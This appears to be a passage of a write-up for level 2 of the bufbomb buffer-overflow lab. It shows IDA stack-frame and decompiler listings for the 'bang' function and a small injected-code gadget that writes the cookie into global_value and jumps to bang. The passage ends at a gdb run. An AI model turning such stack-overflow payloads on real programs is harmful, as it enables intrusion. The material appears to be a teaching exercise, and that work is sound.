; IDA stack-frame view (listing only, not executable code). Offsets are
; relative to the frame base: 0x18 bytes of undefined local space precede the
; `s` / `r` pseudo-variables, which by IDA convention mark the saved-register
; and return-address slots; arg_0 is the first stack argument.
00000018 -00000018 db ? ; undefined
-00000017 db ? ; undefined
-00000016 db ? ; undefined
-00000015 db ? ; undefined
-00000014 db ? ; undefined
-00000013 db ? ; undefined
-00000012 db ? ; undefined
-00000011 db ? ; undefined
-00000010 db ? ; undefined
-0000000F db ? ; undefined
-0000000E db ? ; undefined
-0000000D db ? ; undefined
-0000000C db ? ; undefined
-0000000B db ? ; undefined
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 db ? ; undefined
-00000007 db ? ; undefined
-00000006 db ? ; undefined
-00000005 db ? ; undefined
-00000004 db ? ; undefined
-00000003 db ? ; undefined
-00000002 db ? ; undefined
-00000001 db ? ; undefined
+00000000 s db 4 dup(?) ; saved registers (IDA convention)
+00000004 r db 4 dup(?) ; return address slot (IDA convention)
+00000008 arg_0 dd ?
+0000000C
+0000000C ; end of stack variables
Now we arrive at level 2: we need to use the stack overflow to jump to bang and make global_value == cookie (damn, if I could use pwntools this would be very easy).
/*
 * IDA decompiler output of the target's `bang` routine, the function the
 * level-2 overflow redirects control to. It reports whether `global_value`
 * equals the cookie (the value the program prints at startup, see the gdb
 * run below) and calls validate(2) only on a match; either way it never
 * returns because it ends in exit(0). `global_value`, `cookie`, `validate`
 * and `__printf_chk` are defined elsewhere in the binary.
 */
void __noreturn bang()
{
    const int matched = (global_value == cookie);

    /* Report first, exactly as the original does, then validate on a hit.
     * The format strings are literals, so the fortified printf is safe here. */
    __printf_chk(1,
                 matched ? "Bang!: You set global_value to 0x%x\n"
                         : "Misfire: global_value = 0x%x\n",
                 global_value);
    if (matched) {
        validate(2);    /* level-2 success path */
    }
    exit(0);
}
We can see that the address of the global variable is 0x0804D100:
.bss:0804D100 global_value dd ? ; DATA XREF: bang+6↑r
OK, let's go: now we can use a gadget to set its value.
# Gadget from the writeup (AT&T syntax). The operands come from the listings
# above: 0x804d100 is global_value in .bss, 0x4e06a707 is the cookie gdb printed.
movl $0x4e06a707,0x804d100   # change value
push $0x8048c9d
ret                          # push and ret just like call
Then we need to use gdb to find the location of the write function **(eax stores the return value, so we change the return value here to the code we passed above)**:
pwndbg> r -u i am lovely please give me money Starting program: /home/q/bufbomb -u i am lovely please give me money Userid: i Cookie: 0x4e06a707